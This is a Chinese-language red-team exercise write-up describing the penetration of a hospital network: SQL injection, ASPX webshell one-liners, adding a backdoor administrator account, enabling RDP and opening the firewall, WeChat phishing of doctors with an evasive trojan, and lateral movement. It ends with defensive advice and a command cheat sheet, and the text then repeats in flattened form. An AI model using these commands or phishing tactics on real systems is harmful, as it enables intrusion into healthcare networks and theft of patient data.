实战|近期某省级HVV实战回忆录

字数 1443 2025-08-22 12:22:15

省级HVV实战教学：医疗行业靶标渗透测试全流程解析

前言

本教学文档基于某省级HVV实战案例，详细解析医疗行业靶标的渗透测试流程。文档包含信息收集、漏洞利用、横向移动、权限维持等关键环节，特别针对内网不出网环境下的多种突破方法进行深入讲解。

靶标行业特点分析

医疗行业(HIS系统)渗透测试特点：

常见攻击路径：
- 互联网网站控制服务器后横向移动
- 钓鱼进入内网(需突破隔离网)
- 近源攻击(本次规则禁止)
公有云服务器优势：
- 可利用靶标单位内部资料信息提高社工成功率
- 可利用短信/邮件接口下发钓鱼文件

第一阶段：信息收集与初始入侵

1. 信息收集

常规信息收集不赘述
重点关注：
- 公众号/小程序接口测试
- 子域名枚举及C段扫描
- 发现.NET开发的网站(站库分离架构)

2. SQL注入利用

发现过程：

手工测试发现明显注入点
使用sqlmap进行自动化注入

利用结果：

获取system权限
发现内网网段：172.18.x.x和172.16.x.x
确认无杀软防护

命令记录：

# 添加用户并加入管理员组
net user hacker Password123! /add
net localgroup administrators hacker /add

3. 上线受阻问题解决

问题现象：

机器不出网(ping DNS不通)
常规上线方式(certutil/powershell)均失败

解决思路：

尝试端口转发+RDP
写入webshell进行控制

第二阶段：Webshell写入与利用

1. Webshell写入问题

问题现象：

涉及中文路径的命令报错
写入后访问返回401/404错误

解决方案：

使用遍历命令查找web路径：

for /r C:\ %i in (*.aspx) do echo %i >> path.txt

写入一句话Webshell：

cmd /c "d: & echo ^<%eval request(\"chopper\")%^> > a.aspx"

注意事项：

Windows注入需防止转义
401错误可能由权限或配置问题导致

第三阶段：数据利用与社工钓鱼

1. 数据库信息利用

通过SQL注入dump数据
发现字段特点：
- 密码为加盐MD5，无法破解
- 包含有效手机号信息

2. 钓鱼攻击实施

钓鱼过程：

通过公众号确认医生信息
微信直接添加目标为好友
建立信任后发送"免杀"木马

问题与解决：

木马不上线(可能VPS被标记)
改用向日葵便携版实现控制

第四阶段：内网横向移动

1. 初始横向尝试

使用CS改版原生马控制社工机器
收集浏览器记录和存储密码
发现HIS系统需要Ukey认证

2. 端口转发与RDP连接

尝试方法：

NPS隧道建立
转发3389端口失败
修改RDP端口：

reg add "HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 3388 /f
net start TermService

失败原因：

网闸限制

3. 二次社工突破

过程：

利用已有手机号社工其他科室人员
通过中间人介绍建立信任
控制主任机器(双网卡)

关键发现：

主任机器安装Inode客户端
通过锐捷代理可访问核心网

第五阶段：核心网络控制

1. 权限提升与维持

通过主任机器访问内网多台服务器和数据库
获取核心系统控制权

2. 工具与技巧总结

内网扫描：

使用fscan扫描内网(禁ping环境需加-np参数)

fscan -h 172.18.1.1/24 -np

不出网环境突破方法：

端口转发+RDP
Webshell写入
社工钓鱼+远程控制工具
利用双网卡机器作为跳板

经验总结与防御建议

攻击方经验

不要假设目标机器出网
多种上线方式需提前准备
社工是突破隔离网络的有效手段
内网中双网卡机器是宝贵资源

防御建议

网络层面：
- 严格限制互联网映射机器的出网权限
- 加强网闸策略配置
系统层面：
- 及时修补SQL注入等漏洞
- 部署EDR等防护软件
管理层面：
- 加强员工安全意识培训
- 建立严格的远程控制工具使用规范

附录：常用命令速查

Windows权限维持：

net user [username] [password] /add
net localgroup administrators [username] /add

RDP服务管理：

reg add "HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow

文件搜索：

for /r C:\ %i in (*.aspx) do echo %i >> paths.txt

Webshell写入：

echo ^<%@ Page Language="C#" %^>^<%eval(Request.Item["cmd"],"unsafe");%^> > shell.aspx

省级HVV实战教学：医疗行业靶标渗透测试全流程解析前言本教学文档基于某省级HVV实战案例，详细解析医疗行业靶标的渗透测试流程。文档包含信息收集、漏洞利用、横向移动、权限维持等关键环节，特别针对内网不出网环境下的多种突破方法进行深入讲解。靶标行业特点分析医疗行业(HIS系统)渗透测试特点：常见攻击路径：互联网网站控制服务器后横向移动钓鱼进入内网(需突破隔离网) 近源攻击(本次规则禁止) 公有云服务器优势：可利用靶标单位内部资料信息提高社工成功率可利用短信/邮件接口下发钓鱼文件第一阶段：信息收集与初始入侵 1. 信息收集常规信息收集不赘述重点关注：公众号/小程序接口测试子域名枚举及C段扫描发现.NET开发的网站(站库分离架构) 2. SQL注入利用发现过程：手工测试发现明显注入点使用sqlmap进行自动化注入利用结果：获取system权限发现内网网段：172.18.x.x和172.16.x.x 确认无杀软防护命令记录： 3. 上线受阻问题解决问题现象：机器不出网(ping DNS不通) 常规上线方式(certutil/powershell)均失败解决思路：尝试端口转发+RDP 写入webshell进行控制第二阶段：Webshell写入与利用 1. Webshell写入问题问题现象：涉及中文路径的命令报错写入后访问返回401/404错误解决方案：使用遍历命令查找web路径：写入一句话Webshell：注意事项： Windows注入需防止转义 401错误可能由权限或配置问题导致第三阶段：数据利用与社工钓鱼 1. 数据库信息利用通过SQL注入dump数据发现字段特点：密码为加盐MD5，无法破解包含有效手机号信息 2. 钓鱼攻击实施钓鱼过程：通过公众号确认医生信息微信直接添加目标为好友建立信任后发送"免杀"木马问题与解决：木马不上线(可能VPS被标记) 改用向日葵便携版实现控制第四阶段：内网横向移动 1. 初始横向尝试使用CS改版原生马控制社工机器收集浏览器记录和存储密码发现HIS系统需要Ukey认证 2. 端口转发与RDP连接尝试方法： NPS隧道建立转发3389端口失败修改RDP端口：失败原因：网闸限制 3. 二次社工突破过程：利用已有手机号社工其他科室人员通过中间人介绍建立信任控制主任机器(双网卡) 关键发现：主任机器安装Inode客户端通过锐捷代理可访问核心网第五阶段：核心网络控制 1. 权限提升与维持通过主任机器访问内网多台服务器和数据库获取核心系统控制权 2. 工具与技巧总结内网扫描：使用fscan扫描内网(禁ping环境需加-np参数) 不出网环境突破方法：端口转发+RDP Webshell写入社工钓鱼+远程控制工具利用双网卡机器作为跳板经验总结与防御建议攻击方经验不要假设目标机器出网多种上线方式需提前准备社工是突破隔离网络的有效手段内网中双网卡机器是宝贵资源防御建议网络层面：严格限制互联网映射机器的出网权限加强网闸策略配置系统层面：及时修补SQL注入等漏洞部署EDR等防护软件管理层面：加强员工安全意识培训建立严格的远程控制工具使用规范附录：常用命令速查 Windows权限维持： RDP服务管理：文件搜索： Webshell写入：